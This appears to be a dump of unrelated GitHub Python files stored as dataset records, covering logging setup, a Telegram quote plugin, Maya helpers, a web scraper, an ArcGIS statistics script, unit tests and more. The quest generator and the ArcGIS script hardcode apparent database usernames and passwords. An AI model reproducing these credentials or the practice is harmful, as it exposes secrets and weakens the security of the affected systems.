实例化\r\nlogger = logging.getLogger('test_log')\r\n\r\n#设置级别\r\nlogger.setLevel(logging.DEBUG) 
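# a record must clear this logger-level floor first, then each handler's own level;\r\n# e.g. with the DEBUG / ERROR / DEBUG levels configured below, an illustrative\r\n# logger.warning('disk almost full') call would reach test_file.log but not the console\r\n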
#Set the minimum level: records below it are never kept\r\n\r\n#Define the handlers\r\n    #define the console output handler\r\nsh = logging.StreamHandler()\r\nsh.setLevel(logging.ERROR)   # only ERROR and above reach the console; lower levels are not shown there\r\n\r\n    #also write records to a file\r\nfh = logging.FileHandler('test_file.log')\r\nfh.setLevel(logging.DEBUG)  # DEBUG and above are written to the log file\r\n#Formatting\r\nformatter = logging.Formatter(\r\n    'time:%(asctime)s,'\r\n    'level:%(levelname)s,'\r\n    'message:%(message)s'\r\n)\r\n#Attach the formatter so both destinations use the same layout\r\nsh.setFormatter(formatter)   #console\r\nfh.setFormatter(formatter)   #file\r\n\r\n#Activate logging: add both handlers to the logger object\r\nlogger.addHandler(sh)\r\nlogger.addHandler(fh)\r\n\r\n#Test\r\nif __name__ == '__main__':\r\n    # logger.debug('testing')\r\n    # logger.info('running normally')\r\n    # logger.warning('a warning')\r\n    # logger.error('an error')\r\n    # logger.critical('no longer able to run')\r\n\r\n    def fun(a):   #logging helper\r\n        try:\r\n            num = 20 / a\r\n            logger.info(num)   #no exception means normal operation\r\n        except Exception as e:\r\n            logger.error(e)   #record the error if one is raised\r\n    fun(0)\r\n","repo_name":"znzhhy/Advanced","sub_path":"classroom/logging模块.py","file_name":"logging模块.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30734784220","text":"# inspired from uniborg Quotes plugin\nimport random\n\nimport requests\n\nfrom userbot import catub\n\nfrom ..core.logger import logging\nfrom ..core.managers import edit_delete, edit_or_reply\nfrom ..helpers import catmemes\n\nLOGS = logging.getLogger(__name__)\nplugin_category = \"extra\"\n\n\n@catub.cat_cmd(\n    pattern=\"quote(?: |$)(.*)\",\n    command=(\"quote\", plugin_category),\n    info={\n        \"header\": \"To get random quotes on given topic.\",\n        \"description\": \"An API that fetches a random quote from `goodreads.com`\",\n        \"usage\": \"{tr}quote \",\n        \"examples\": \"{tr}quote love\",\n    },\n)\nasync def quote_search(event):\n    \"shows random quotes on given topic.\"\n    catevent = await edit_or_reply(event, \"`Processing...`\")\n    input_str = event.pattern_match.group(1)\n    if not input_str:\n        api_url = \"https://quotes.cwprojects.live/random\"\n        try:\n            response = requests.get(api_url).json()\n        except Exception:\n            response = None\n    else:\n        api_url = f\"https://quotes.cwprojects.live/search/query={input_str}\"\n        try:\n            response = random.choice(requests.get(api_url).json())\n        except Exception:\n            response = None\n    if response is not None:\n        await catevent.edit(f\"`{response['text']}`\")\n    else:\n        await edit_delete(catevent, \"`Sorry Zero results found`\", 5)\n\n\n@catub.cat_cmd(\n    pattern=\"pquote$\",\n    command=(\"pquote\", plugin_category),\n    info={\n        \"header\": \"To get random quotes on programming.\",\n        \"usage\": \"{tr}pquote\",\n    },\n)\nasync def _(event):\n    \"Shows random programming quotes\"\n    txt = random.choice(catmemes.PROGQUOTES)\n    await edit_or_reply(event, txt)\n","repo_name":"immortal1256/ToxicOp","sub_path":"userbot/plugins/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37817766734","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains functions related to nodes selection.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import List\n\nimport maya.cmds as cmds\nimport maya.mel as mel\n\n\ndef selection_type(selection: List[str]) -> str | None:\n\t\"\"\"\n\tReturns the \"object\" or \"component\" or \"uv\" type depending on the first type of the given selection.\n\n\t:param List[str] selection: selected objects, components or UVs.\n\t:return: selected component type (\"component\", \"object\" or \"uv\").\n\t:rtype: str or None\n\t\"\"\"\n\n\tif not selection:\n\t\treturn None\n\n\tif '.' not in selection[0]:\n\t\treturn 'object'\n\telif '.vtx[' in selection[0]:\n\t\treturn 'component'\n\telif '.e[' in selection[0]:\n\t\treturn 'component'\n\telif '.f[' in selection[0]:\n\t\treturn 'component'\n\telif '.map[' in selection[0]:\n\t\treturn 'uv'\n\n\treturn None\n\n\ndef components_type(components: List[str]) -> str | None:\n\t\"\"\"\n\tReturns the \"object\" or \"component\" or \"uv\" type depending on the first type of the given selection.\n\n\t:param List[str] components: selected objects, components or UVs.\n\t:return: selected component type (\"object\", \"vertices\", \"edges\", \"faces\" or \"uvs\").\n\t:rtype: str or None\n\t\"\"\"\n\n\tif not components:\n\t\treturn None\n\n\tif '.' not in components[0]:\n\t\treturn 'object'\n\telif '.vtx[' in components[0]:\n\t\treturn 'vertices'\n\telif '.e[' in components[0]:\n\t\treturn 'edges'\n\telif '.f[' in components[0]:\n\t\treturn 'faces'\n\telif '.map[' in components[0]:\n\t\treturn 'uvs'\n\n\treturn None\n\n\ndef convert_selection(type_to_convert: str = 'faces') -> List[str]:\n\t\"\"\"\n\tConverts current selection to the given selection type. 
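A minimal usage sketch (hypothetical object and component names, assuming an active selection):\n\n\t\tcmds.select('pCube1.f[0]')\n\t\tconvert_selection('edges')\t\t# -> e.g. ['pCube1.e[0]', 'pCube1.e[1]', ...]\n\n\t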
Supported selection types:\n\t\t\"faces\", \"vertices\", \"edges\", \"edgeLoop\", \"edgeRing\", \"edgePerimeter\", \"uvs\", \"uvShll\", \"uvShellBorder\"\n\n\t:param str type_to_convert: selection to convert to.\n\t:return: converted selection.\n\t:rtype: List[str]\n\t\"\"\"\n\n\tif type_to_convert == 'faces':\n\t\tmel.eval('ConvertSelectionToFaces;')\n\telif type_to_convert == 'vertices':\n\t\tmel.eval('ConvertSelectionToVertices;')\n\telif type_to_convert == 'edges':\n\t\tmel.eval('ConvertSelectionToEdges;')\n\telif type_to_convert == 'uvs':\n\t\tmel.eval('ConvertSelectionToUVs;')\n\telif type_to_convert == 'edgeLoop':\n\t\tmel.eval('SelectEdgeLoopSp;')\n\telif type_to_convert == 'edgeRing':\n\t\tmel.eval('SelectEdgeRingSp;')\n\telif type_to_convert == 'edgePerimeter':\n\t\tmel.eval('ConvertSelectionToEdgePerimeter;')\n\telif type_to_convert == 'uvShell':\n\t\tmel.eval('ConvertSelectionToUVShell;')\n\telif type_to_convert == 'uvShellBorder':\n\t\tmel.eval('ConvertSelectionToUVShellBorder;')\n\t\n\treturn cmds.ls(selection=True)\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/tp/maya/cmds/nodes/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"15168919077","text":"from faker import Faker\nfrom random import randint\nfrom random import uniform\nfrom random import choice\nimport datetime\nimport sys\nimport json\nimport psycopg2\nN = 10\n\nquest_types = [\"Основной\", \"Второстепенный\"]\nquest_issuings = [\"Йеннифэр\", \"Доска объявлений\", \"Письмо\", \"Трисс Меригольд\"]\n\ndef num_of_quests():\n try:\n\n con = psycopg2.connect(\n database=\"Witcher\",\n user=\"erlendum\",\n password=\"parasha\",\n host=\"localhost\",\n port=\"5432\"\t\t \n )\n except:\n print(\"Ошибка при подключении к Базе Данных\")\n return\n cur = con.cursor()\n\n cur.execute(\"SELECT max(quest_id) from witcher.quests;\")\n\n rows = cur.fetchall()\n\n cur.close()\n con.close()\n return rows[0][0]\n\n\ndef generate_quests(num):\n faker = Faker(locale=\"ru_RU\")\n f = open(str(sys.argv[1]) + '_quests_' + str(datetime.datetime.now().strftime(\"%d-%m-%Y_%H:%M:%S\")) + '.json', 'w', encoding='utf8')\n f.write('[\\n')\n for i in range(N):\n quest_type_id = randint(0, len(quest_types) - 1)\n quest_issuing_id = randint(0, len(quest_issuings) - 1)\n obj = {}\n obj['quest_id'] = num + i + 1\n obj['quest_name'] = faker.text()\n obj['quest_type'] = quest_types[quest_type_id]\n obj['quest_issuing'] = quest_issuings[quest_issuing_id]\n obj['quest_reward'] = str(randint(0, 500)) + ' оренов'\n\n if i != N - 1:\n f.write(json.dumps(obj, ensure_ascii=False) + ', \\n')\n else:\n f.write(json.dumps(obj, ensure_ascii=False) + '\\n')\n f.write(']')\n f.close()\n\nnum = num_of_quests()\ngenerate_quests(num)","repo_name":"Erlendum/BMSTU_DB","sub_path":"labs/lab_08/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16593508025","text":"from django.conf import settings as django_settings\nfrom google.appengine.api import users\nfrom common import component\nfrom common import util\n\n\ndef settings(request):\n\n d = dict([(k, getattr(django_settings, k))\n for k in django_settings.get_all_members()])\n return dict(**d)\n\ndef components(request):\n return {'component': component}\n\ndef flash(request):\n if 'flash' not in request.REQUEST:\n return 
{}\n\n  flash = request.REQUEST['flash']\n  nonce = util.create_nonce(None, flash)\n  if nonce != request.REQUEST.get('_flash', ''):\n    return {}\n  return {'flash': flash}\n\ndef gaia(request):\n  try:\n    gaia_user = users.GetCurrentUser()\n    gaia_login = users.CreateLoginURL(request.META['PATH_INFO'])\n    gaia_logout = users.CreateLogoutURL('/logout')\n  except:\n    gaia_user = None\n    gaia_login = \"gaia_login\"\n    gaia_logout = \"gaia_logout\"\n  return locals()\n","repo_name":"anhpt379/Inforlearn","sub_path":"common/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33567650124","text":"#!/usr/bin/python\n#imports\nimport rospy\nfrom image_echo.msg import HSV\n\nclass HSVChanger():\n    '''\n    Allows a user to change HSV values on the fly\n    '''\n    def __init__(self):\n        '''\n        initializes the node\n        :param self: the node itself\n        '''\n        rospy.init_node(\"HSVman\", anonymous=False) #creates the node\n        self.pub = rospy.Publisher(\"/hsv\", HSV, queue_size=1) #makes a publisher\n\n        rospy.on_shutdown(self.on_shutdown) #defines the shutdown function for killing the node\n\n        self.rate = 10 #rate of publishing\n        r = rospy.Rate(self.rate)\n\n        self.is_running = True\n        while self.is_running:\n\n            value = input(\"Input Upper H, S, or V (uh, us, uv) or Lower H, S, V (lh, ls, lv)\")\n\n            self.my_message = HSV()\n            print(value)\n\n    def on_shutdown(self):\n        self.is_running = False\n        print(\"HSVman shutting down\")\n","repo_name":"GSSM-ROS/2017-racecar-63","sub_path":"image_echo/src/HsvRuntime.py","file_name":"HsvRuntime.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69887771640","text":"'''\nChallenge:\n\nUse the Python packages requests and BeautifulSoup to extract the 10 most popular GitHub projects. 
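(The trending page is plain, server-rendered HTML, so a single requests.get followed by BeautifulSoup parsing with the built-in 'html.parser' is assumed to be sufficient; no login or JavaScript execution should be required.) 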
Go to the link https://github.com/trending\n\nWrite the extracted data to the csv file github.csv separated by ;\n'''\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup as soup\nfrom requests.exceptions import HTTPError\n\nconteudo = None\n\ntry:\n    # Make the HTTP request to the page\n    resposta = requests.get('https://github.com/trending')\n    resposta.raise_for_status()\nexcept HTTPError as exc:\n    print(exc)\nelse:\n    # Get the body of the response\n    conteudo = resposta.text\n\n# Parse the HTML content using the BeautifulSoup library\npagina = soup(conteudo, 'html.parser')\n\n# Collect the repositories\nrepositorios = pagina.find_all(\"article\", class_=\"Box-row\")\n\n# Open the CSV file in append mode\nwith open(file='./arquivos/github.csv', mode='a', newline='', encoding='utf8') as arquivo:\n    # Create a writer object from the csv module\n    escrever = csv.writer(arquivo, delimiter=';')\n\n    # Write the header\n    escrever.writerow(['ranking', 'project', 'language',\n                       'stars', 'stars_today', 'forks'])\n\n    # Iterate over the repositories and extract the information\n    for i, repositorio in enumerate(repositorios[:10], start=1):\n        # Get the title\n        titulo = repositorio.find(\"h2\")\n        # Split the title into user and repository\n        titulo = titulo.text.strip().replace(\"\\n\", \"\").replace(\" \", \"\").split(\"/\")\n        usuario = titulo[0]\n        projeto = titulo[1]\n\n        # Get the language\n        linguagens_tag = repositorio.find(\n            \"span\", itemprop=\"programmingLanguage\")\n        if linguagens_tag:\n            linguagem = linguagens_tag.text.strip()\n\n        # Get the number of stars\n        estrelas_tag = repositorio.find(\n            \"a\", class_=\"Link--muted d-inline-block mr-3\")\n        if estrelas_tag:\n            estrelas = estrelas_tag.text.strip()\n\n        # Get the total number of forks\n        forks_tag = repositorio.find(\"a\", href=f\"/{usuario}/{projeto}/forks\")\n        if forks_tag:\n            forks = forks_tag.text.strip()\n\n        # Get the stars gained today\n        estrelas_hoje_tag = repositorio.find(\n            \"span\", class_=\"d-inline-block float-sm-right\")\n        if estrelas_hoje_tag:\n            estrelas_hoje = estrelas_hoje_tag.text.strip().replace(\" \",\n                                                                   \"/\").split(\"/\")[0]\n\n        # Write the data to the CSV file\n        escrever.writerow(\n            [i, projeto, linguagem, estrelas, estrelas_hoje, forks])\n\n# Success message\nprint('Trending CSV generated successfully!')\n","repo_name":"ronaldoaires/ebac-analista-de-dados","sub_path":"desafios/03-github-trending.py","file_name":"03-github-trending.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44316489401","text":"import sys\nfrom logging import Logger, Formatter, StreamHandler, Filter, LogRecord\nfrom logging import getLogger, addLevelName, getLevelName\nfrom logging import DEBUG, INFO\n\n\"\"\"\nhttps://docs.python.org/3/howto/logging.html#configuring-logging-for-a-library\n\nNote It is strongly advised that you do not log to the root logger in your library. Instead, use a logger with a unique and easily identifiable name, such as the __name__ for your library’s top-level package or module. 
Logging to the root logger will make it difficult or impossible for the application developer to configure the logging verbosity or handlers of your library as they wish.\n\"\"\"\n_is_configured: bool = False\n\n# Define TRACE log level\nTRACE = 1\n\n# \"Register\" new loggin level\naddLevelName(TRACE, 'TRACE') \n\n# Verify\nassert getLevelName(TRACE) == 'TRACE'\n\n\ndef configure_logging(level: int = DEBUG) -> None: \n global _is_configured\n if _is_configured:\n return\n\n # Reconfiguring the logger here will also affect test running in the PyCharm IDE (i.e. IntelliJ Python plugin)\n # and VS Code IDE\n root_logger: Logger = getLogger()\n root_logger.setLevel(level)\n formatter: Formatter = Formatter('%(relativeCreated)d (%(name)s) | %(levelname)s | [%(module)s:%(lineno)s] | %(funcName)s | %(message)s')\n console_handler: StreamHandler = StreamHandler(sys.stdout)\n console_handler.setFormatter(formatter)\n root_logger.addHandler(console_handler)\n\n introspect_logger: Logger = getLogger(\"common.introspect\")\n introspect_logger.setLevel(INFO)\n\n page_dump_logger: Logger = getLogger(\"roampub.page_dump\")\n page_dump_logger.setLevel(level)\n\n roam_model_logger: Logger = getLogger(\"roampub.roam_model\")\n roam_model_logger.setLevel(level)\n\n _is_configured = True\n\n\nclass FunctionFilter(Filter):\n \"\"\"\n Filters *out* ``LogRecord`` based on function name\n \"\"\"\n def __init__(self, function_names: list[str]):\n self._function_names = function_names\n\n def filter(self, record: LogRecord) -> bool:\n return not record.funcName in self._function_names\n","repo_name":"jpanico/roam","sub_path":"publisher/common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41514986125","text":"from qiniu import Auth\nfrom qiniu import BucketManager\n\naccess_key = 'your_AK'\nsecret_key = 'your_SK'\n\n#初始化Auth状态\nq = Auth(access_key, secret_key)\n#初始化BucketManager\nbucket = BucketManager(q)\n\n#你要测试的空间, 并且这个key在你空间中存在\nbucket_name = '2018_11_16'\nkey = 'test11.png'\n#将文件从文件key 移动到文件key2,可以实现文件的重命名 可以在不同bucket移动\nbucket_name2 = 'app-download'\nkey2 = '我是被移动的测试资源.png'\nret, info = bucket.move(bucket_name, key, bucket_name2, key2)\nprint(info)\nassert ret == {}","repo_name":"pasca520/qiniu","sub_path":"kodo/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29882812893","text":"class Solution():\n\tdef canJump(nums:list) -> bool:\n\t\t# O(n) time greedy\n\t\tfurthestIDX = 0\n\n\t\tfor i in range(len(nums)):\n\t\t\tIDX = i + nums[i]\n\t\t\tfurthestIDX = max(furthestIDX, IDX)\n\t\t\tif furthestIDX < i+1:\n\t\t\t\tbreak\n\n\t\tif furthestIDX < len(nums)-1:\n\t\t\treturn False\n\t\treturn True\n\n\tdef canJump2(nums:list) -> bool:\n\t\t# O(n^2) time dynamic programming\n\t\tcache = {}\n\t\t\n\t\tdef canReachLastIdx(idx):\n\t\t\tif idx in cache:\n\t\t\t\treturn cache[idx]\n\n\t\t\tif idx == len(nums)-1:\n\t\t\t\treturn True\n\n\t\t\tfor i in range(nums[idx]):\n\t\t\t\tif canReachLastIdx(idx + i + 1):\n\t\t\t\t\tcache[idx] = True\n\t\t\t\t\treturn cache[idx]\n\n\t\tif canReachLastIdx(0):\n\t\t\treturn True\n\t\treturn False\n\nnums = [2,3,1,1,4]\n# nums = 
[3,2,1,0,4]\n\nprint(Solution.canJump(nums))\nprint(Solution.canJump2(nums))","repo_name":"alfiyandyhr/leetcodes","sub_path":"55_JumpGame.py","file_name":"55_JumpGame.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24973517076","text":"import arcpy\nimport os\nimport json\nimport unicodedata\nimport tempfile, shutil\n\n# def by_territory(layer, territories, output):\n# arcpy.MakeFeatureLayer_management(\"https://services1.arcgis.com/usA3lHW20rGU6glp/ArcGIS/rest/services/Zenklu_prieziuros_teritorijos_view/FeatureServer/0\", \"Territory\")\n# for territory in territories:\n# if territory != \"Visa teritorija\":\n# arcpy.MakeFeatureLayer_management(\"Territory\", territory, \"SENIUNIJA = '{}'\".format(territory))\n# arcpy.analysis.Clip(layer, territory, output + \"_\" + territory, None)\n# else:\n# arcpy.analysis.Clip(layer, \"Territory\", output + \"_all_territories\", None)\n\ndef hz_line(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"SHAPE@LENGTH\", \"Plotas\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[3] == marking:\n if row[0] == 11: area += row[1]*0.12\n elif row[0] == 110: area += row[1]*0.12 + row[1]*0.0396\n elif row[0] == 111: area += row[1]*0.5\n elif row[0] == 112: area += row[1]*0.175\n elif row[0] == 1131: # nes daznai Plotas yra Null\n if row[2]:\n area += row[1]*0.5*row[2]\n else:\n area += row[1]*0.5*3.5\n elif row[0] == 1132: area += row[1]*0.2035\n elif row[0] == 1133: area += row[1]*0.0286\n elif row[0] == 114: area += row[1]*0.5\n elif row[0] == 12: area += row[1]*0.25\n elif row[0] == 122: area += row[1]*0.125\n elif row[0] == 125: area += row[1]*0.5\n elif row[0] == 126: area += row[1]*0.12\n elif row[0] == 127: area += row[1]*0.37036\n elif row[0] == 13: area += row[1]*0.24\n elif row[0] == 14: area += row[1]*0.12\n elif row[0] == 15: area += row[1]*0.0396\n elif row[0] == 16: area += row[1]*0.0792\n elif row[0] == 17: area += row[1]*0.06\n elif row[0] == 18: area += row[1]*0.0825\n elif row[0] == 19: area += row[1]*0.06\n return area\n\ndef hz_polygon(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"SHAPE@AREA\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[2] == marking:\n if row[0] == 1151: area += row[1]*0.35\n elif row[0] == 1152: area += row[1]*0.35\n elif row[0] == 1153: area += row[1]*0.35\n elif row[0] == 132: area += row[1]*0.2\n elif row[0] == 1322: area += row[1]*0.18\n return area\n\ndef hz_point(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[1] == marking:\n if row[0] == 1161: area += 1.44\n elif row[0] == 1162: area += 1.82\n elif row[0] == 1163: area += 1.82\n elif row[0] == 1164: area += 2.62\n elif row[0] == 1165: area += 2.62\n elif row[0] == 1166: area += 2.62\n elif row[0] == 1167: area += 2.62\n elif row[0] == 1168: area += 2.62\n elif row[0] == 1169: area += 4\n elif row[0] == 11611: area += 2.5\n elif row[0] == 11621: area += 2.5\n elif row[0] == 11631: area += 2.5\n elif row[0] == 11641: area += 3.5\n elif row[0] == 11651: area += 3.5\n elif row[0] == 11691: area += 5\n elif row[0] == 1171: area += 1.98\n elif row[0] == 1172: area += 1.98\n elif row[0] == 118: area += 2.05\n elif row[0] == 119: area += 2\n elif row[0] == 120: area += 6.5\n elif row[0] == 121: area += 2\n elif row[0] == 123: area += 0.5\n elif row[0] == 11231: area += 1\n elif row[0] == 11232: area += 1.5\n elif 
row[0] == 124: area += 0.5\n elif row[0] == 128: area += 2\n elif row[0] == 129: area += 2\n elif row[0] == 130: area += 2\n elif row[0] == 14: area += 1\n elif row[0] == 15: area += 1.5\n return area\n\ndef hz_stats(hz, marking):\n desc = arcpy.Describe(hz)\n shape = desc.shapeType\n if shape == \"Polyline\":\n return hz_line(hz, marking)\n elif shape == \"Polygon\":\n return hz_polygon(hz, marking)\n elif shape == \"Point\":\n return hz_point(hz, marking)\n\nsdeTempPath = tempfile.mkdtemp()\narcpy.CreateDatabaseConnection_management(sdeTempPath,'SDE1.sde','SQL_SERVER','jupiteris2','DATABASE_AUTH','geodinter', 'matavimai3', 'SAVE_USERNAME','VP_SDE1')\narcpy.env.workspace = sdeTempPath + '\\SDE1.sde'\n\nall_hz = []\ntotal_area = 0\n\nhz_name = {1: \"KZ_HZ_Linijos\", 2: \"KZ_HZ_Plotai\", 3: \"KZ_HZ_Taskai\"}\nfor i in [1, 2, 3]:\n all_hz.append(fr'VP_SDE1.INFRASTR.KELIO_ZENKLAI/VP_SDE1.INFRASTR.{hz_name[i]}')\n \narcpy.AddMessage(all_hz)\narcpy.AddMessage(sdeTempPath)\n\nterritories = [\"Šiaurinis\", \"Rytinis\", \"Pietinis\", \"Vakarinis\", \"Centrinis\"]\nmarking = arcpy.GetParameterAsText(1)\n\nkey_to_num = {\"Suma\": 0, \"Plastikas\": 1, \"Dazai\": 2, \"Metalas\": 3, \"Plyteles\": 4, \"Kitas\": 5, \"Asfaltas\": 6, \"Termoplastas\": 7, \"Antislydiminis plastikas\": 8}\nnum_to_key = {0: \"Suma\", 1: \"Plastikas\", 2: \"Dazai\", 3: \"Metalas\", 4: \"Plyteles\", 5: \"Kitas\", 6: \"Asfaltas\", 7: \"Termoplastas\", 8: \"Antislydiminis plastikas\"}\n\nif marking:\n markings = {\"Suma\": 0}\n marking_list = marking.replace(\"'\", \"\").split(\";\")\n temp_markings = dict.fromkeys(marking_list, 0)\n markings.update(temp_markings)\n markings = dict((key_to_num[key], value) for (key, value) in markings.items())\n\narcpy.MakeFeatureLayer_management(str(\"https://services1.arcgis.com/usA3lHW20rGU6glp/ArcGIS/rest/services/Zenklu_prieziuros_teritorijos_view/FeatureServer/0\"), \"Territory\")\n\nterritories_dict = {}\nfor territory in territories:\n territory_markings = {}\n for hz in all_hz:\n \n arcpy.MakeFeatureLayer_management(\"Territory\", territory, \"SENIUNIJA = '{}'\".format(territory))\n hz = arcpy.analysis.Clip(hz, territory, fr'in_memory/{territory}', None)\n\n if marking:\n for mark in markings:\n if mark == 0: continue\n temp_area = hz_stats(hz, mark)\n territory_markings.setdefault(mark, 0)\n territory_markings[mark] += temp_area\n markings[mark] += temp_area\n markings[0] += temp_area\n else:\n for i in range(1, 9):\n total_area += hz_stats(hz, i)\n \n if marking:\n territory_markings = dict((num_to_key[key], value) for (key, value) in territory_markings.items())\n territories_dict[territory] = territory_markings\n else:\n territories_dict[territory] = total_area\n\nnormalized_key = unicodedata.normalize('NFKD', \"\\u0160iaurinis\").encode('ASCII', 'ignore').decode('ASCII')\nterritories_dict[normalized_key] = territories_dict.pop(\"\\u0160iaurinis\")\n \ntotals = {}\nfor territory_data in territories_dict.values():\n for type_name, type_area in territory_data.items():\n if type_name not in totals:\n totals[type_name] = 0\n totals[type_name] += type_area\n\ntotal_area = sum(totals.values())\nterritories_dict[\"Visa teritorija\"] = {type_name: type_area for type_name, type_area in totals.items()}\nterritories_dict[\"Visa teritorija\"][\"Visi tipai\"] = total_area\n\nif marking:\n arcpy.SetParameter(0, json.dumps(territories_dict))\nelse:\n arcpy.SetParameter(0, 
total_area)\n\narcpy.Delete_management(\"in_memory\")\nshutil.rmtree(sdeTempPath)\n","repo_name":"JustasMit/EOP_stat","sub_path":"HZGeneralTool.py","file_name":"HZGeneralTool.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71535351480","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom slp_base.slp_base.errors import LoadingIacFileError\nfrom slp_cft.slp_cft.load.cft_loader import CloudformationLoader\n\n\nclass TestCloudformationLoader(TestCase):\n\n @patch('yaml.load')\n def test_valid_cft(self, yaml_mock):\n # GIVEN a mocked valid yaml source\n source = 'VALID CLOUDFORMATION FILE SOURCE'\n\n # AND a mock of the yaml load function\n yaml_load_result = {'resource': {'name': 'cft_resource'}}\n yaml_mock.side_effect = [yaml_load_result]\n\n # WHEN load function is called\n cft_loader = CloudformationLoader([source])\n cft_loader.load()\n\n # THEN a dict with the Cloudformation data is built\n yaml_mock.assert_called()\n assert cft_loader.get_cloudformation() == yaml_load_result\n\n @patch('yaml.load')\n def test_invalid_cft(self, yaml_mock):\n # GIVEN an invalid yaml source\n source = 'INVALID CLOUDFORMATION FILE SOURCE'\n\n # AND a mock of the yaml load function that returns an error\n yaml_load_error_msg = 'Cannot process given CFT file.'\n yaml_mock.side_effect = Exception(yaml_load_error_msg)\n\n # WHEN load function is called\n # THEN a LoadingIacFileError is raised\n cft_loader = CloudformationLoader([source])\n with self.assertRaises(LoadingIacFileError) as loading_error:\n cft_loader.load()\n\n # AND The error info is right\n assert str(loading_error.exception.title) == 'IaC file is not valid'\n assert str(loading_error.exception.message) == yaml_load_error_msg\n\n def test_empty_file(self):\n pass\n # GIVEN an empty yaml source\n source = ''\n\n # WHEN load function is called\n # THEN a LoadingIacFileError is raised\n cft_loader = CloudformationLoader([source])\n with self.assertRaises(LoadingIacFileError) as loading_error:\n cft_loader.load()\n\n # AND an empty IaC file message is on the exception\n assert str(loading_error.exception.title) == 'IaC file is not valid'\n assert str(loading_error.exception.message) == 'IaC file is empty'\n","repo_name":"iriusrisk/startleft","sub_path":"slp_cft/tests/unit/load/test_cft_loader.py","file_name":"test_cft_loader.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"6497547974","text":"from bs4 import BeautifulSoup\nimport subprocess\n\ndef get_new_notes() :\n with open(\"old_notes.html\") as file :\n soup = BeautifulSoup(file, 'lxml')\n\n with open(\"notes.html\") as file2 :\n soup2 = BeautifulSoup(file2, 'lxml')\n\n liste1 = []\n liste2 = []\n tbody1 = soup.tbody\n tbody2 = soup2.tbody\n\n for balise in tbody1.contents :\n if(balise.name == \"tr\") :\n ligne = balise.contents\n matiere = ligne[2]\n note = ligne[3]\n if(len(matiere.contents) == 1) :\n if(len(note.contents) == 1) :\n liste1.append(matiere.string)\n\n for balise in tbody2.contents :\n if(balise.name == \"tr\") :\n ligne = balise.contents\n matiere = ligne[2]\n note = ligne[3]\n if(len(matiere.contents) == 1) :\n if(len(note.contents) == 1) :\n liste2.append(matiere.string)\n\n for i in range (0, len(liste1)) :\n liste1[i] = liste1[i].strip()\n\n for i in range (0,len(liste2)) :\n liste2[i] = liste2[i].strip()\n\n if(len(liste1) <= 
len(liste2)) :\n        # filter on a copy: calling liste2.remove() while iterating over liste2 skips elements\n        liste2 = [e for e in liste2 if e not in liste1]\n\n    return liste2\n\ndef get_actual_notes() :\n    with open(\"notes.html\") as file :\n        soup = BeautifulSoup(file, 'lxml')\n\n    liste = []\n    tbody = soup.tbody\n\n    for balise in tbody.contents :\n        if(balise.name == \"tr\") :\n            ligne = balise.contents\n            matiere = ligne[2]\n            note = ligne[3]\n            if(len(matiere.contents) == 1) :\n                if(len(note.contents) == 1) :\n                    liste.append(matiere.string)\n\n    for i in range (0, len(liste)) :\n        liste[i] = liste[i].strip()\n\n    return liste\n\ndef check_diff() :\n    proc = subprocess.run([\"diff\", \"notes.html\", \"old_notes.html\"])\n    return(0 if proc.returncode == 0 else 1)","repo_name":"Maxwelito/uca-grades-discord-bot","sub_path":"parse_html.py","file_name":"parse_html.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36068153070","text":"from dateutil.relativedelta import relativedelta\nfrom odoo import fields\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestPurchaseOrderStockPickingDatePlanned(TransactionCase):\n\n    def setUp(self):\n        super().setUp()\n        self.partner = self.env['res.partner'].create({\n            'name': 'Test partner',\n        })\n        self.product = self.env['product.product'].create({\n            'type': 'product',\n            'company_id': False,\n            'name': 'Test product',\n            'standard_price': 50,\n            'list_price': 50,\n        })\n        self.purchase = self.env['purchase.order'].create({\n            'partner_id': 